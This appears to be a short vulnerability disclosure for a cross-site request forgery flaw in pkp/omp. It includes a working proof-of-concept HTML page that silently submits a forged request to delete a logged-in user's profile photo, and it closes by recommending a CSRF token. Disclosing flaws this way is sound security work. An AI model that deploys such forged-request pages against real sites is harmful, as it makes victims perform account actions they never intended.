Cross-Site Request Forgery (CSRF) in pkp/omp
Oct 14th 2021
Attacker or malicious user is able to delete any user profile photo if a logged in user visits attacker website. because lack of CSRF token
🕵️♂️ Proof of Concept
1.when you logged in open this
POC.html in a browser
2.you can check unintentionally your profile photo deleted
//POC.html <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://demo.publicknowledgeproject.org/omp3/demo/index.php/aup-demo/$$$call$$$/tab/user/profile-tab/delete-profile-image"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of forcing user to unintentional delete profile photo
Tested on Firefox and safari.
You should set a CSRF token on this requeset.